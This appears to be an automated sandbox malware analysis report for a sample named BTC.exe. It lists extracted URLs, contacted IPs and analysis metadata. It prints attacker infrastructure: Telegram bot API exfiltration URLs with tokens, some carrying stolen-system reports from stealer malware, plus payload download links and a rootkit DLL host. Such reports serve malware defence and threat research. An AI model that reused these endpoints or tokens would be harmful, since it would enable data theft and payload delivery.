                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-09-03%2012:16:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20936905%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20HGRRGE87%0ARAM:%204095MB%0AHWID:%20BD77145644%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=Truetrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabtmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svgWindow Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/botsvchost.exe.0.dr, crack.exe.0.drtrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://go.microPackageManagementppowershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/LimerBoy/StormKittyupdate.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, update.exe.0.dr, svchost.exe.0.drfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://payloads-poison.000webhostapp.com/r77-x86.dllWindow Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmptrue
                            • 8%, Virustotal, Browse
                            • Avira URL Cloud: phishing
                            		unknown
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.comWindow Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://91.134.207.16/WinSCP.comWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 8%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.mylnikov.orgupdate.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 3%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.ipify.org/Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessageupdate.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmptrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/ngrok.exeWindows Security.exe.6.drfalse
                            • 9%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.orgdsvchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://icanhazip.comupdate.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/Install.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecrack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4466004136.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://go.microPpowershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://freegeoip.net/xml/Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svgWindow Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.datacontract.org/2004/07/Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/autoupdate1.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 12%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendsvchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drfalse
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.ecosia.org/newtab/tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.raw.5.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.miupowershell.exe, 00000011.00000002.2371162192.0000000006D80000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ifconfig.me/crack.exe, 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, crack.exe, 00000002.00000002.2043779712.0000000002851000.00000004.00000800.00020000.00000000.sdmp, crack.exe.0.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/LimerBoy/StormKitty0&eqsvchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 3%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/update.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLplaces.raw.5.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://91.134.207.16/rdpinstall.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • 10%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgdupdate.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.mylnikov.orgdupdate.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/file/botsvchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.orgcrack.exe, 00000002.00000002.2043779712.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.mylnikov.orgupdate.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.134.207.16/ngrok.exe=setWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=62917svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgcrack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.orgDsvchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15dupdate.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.134.207.16/WinSCP.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-make-a-website.svgWindow Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://a.optnmstr.com/app/js/api.min.jsWindow Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=62917update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.134.207.16/getrdp.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.000webhost.com/static/default.000webhost.com/images/cdn/000webhost-logo-coral-pink.svgWindow Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.000webhost.com/cpanel-login?utm_source=000&utm_medium=no-such-website&utm_campaign=pagesWindow Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.134.207.16Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.134.207.16/autoupdate2.exeWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://icanhazip.comdupdate.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://icanhazip.com/tupdate.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.mylnikov.org/geolocation/wifi?v=1.1&update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.hostinger.com/special/000webhost?utm_source=000webhost&utm_medium=frontend&utm_campaign=Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://payloads-poison.000webhostapp.comWindow Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drtrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://127.0.0.1:4040/api/tunnelsWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.teleupdate.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://payloads-poison.000webhostapp.comWindow Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              http://us-east-1.route-1.000webhost.awex.ioWindow Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.000webhost.com/free-website-sign-up?utm_source=000webhost&utm_medium=frontend&utm_campaiWindow Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://support.mozilla.orgplaces.raw.5.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.000webhost.com/static/default.000webhost.com/images/cdn/favicon.icoWindow Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              149.154.167.220
                              		api.telegram.orgUnited Kingdom
                              		62041TELEGRAMRUtrue
                              208.95.112.1
                              		ip-api.comUnited States
                              		53334TUT-ASUStrue
                              167.99.94.206
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              165.227.91.90
                              		unknownUnited States
                              		14061DIGITALOCEAN-ASNUStrue
                              146.190.29.250
                              		unknownUnited States
                              		702UUNETUStrue
                              104.16.185.241
                              		icanhazip.comUnited States
                              		13335CLOUDFLARENETUStrue
                              172.67.196.114
                              		api.mylnikov.orgUnited States
                              		13335CLOUDFLARENETUStrue
                              64.23.232.116
                              		unknownUnited States
                              		3064AFFINITY-FTLUStrue
                              91.134.207.16
                              		unknownFrance
                              		16276OVHFRfalse
                              185.252.232.158
                              		unknownGermany
                              		46261QUICKPACKETUStrue
                              145.14.144.231
                              		us-east-1.route-1.000webhost.awex.ioNetherlands
                              		204915AWEXUSfalse

                              Private

                              IP
                              127.0.0.1

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1503194
                              Start date and time:2024-09-03 06:15:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 14m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:115
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:BTC.exe
                              Detection:MAL
                              Classification:mal100.rans.troj.spyw.evad.winEXE@160/314@6/12
                              EGA Information:
                              • Successful, ratio: 61.1%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 456
                              • Number of non-executed functions: 11
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target BTC.exe, PID 2796 because it is empty
                              • Execution Graph export aborted for target Windows Defender Service Host.exe, PID 6588 because it is empty
                              • Execution Graph export aborted for target Windows Defender Service Host.exe, PID 7500 because it is empty
                              • Execution Graph export aborted for target Windows Defender Service Host.exe, PID 8700 because it is empty
                              • Execution Graph export aborted for target Windows Defender Service Host.exe, PID 9140 because it is empty
                              • Execution Graph export aborted for target crack.exe, PID 5972 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 5580 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:15:57API Interceptor1x Sleep call for process: crack.exe modified
                              00:16:01API Interceptor317x Sleep call for process: powershell.exe modified
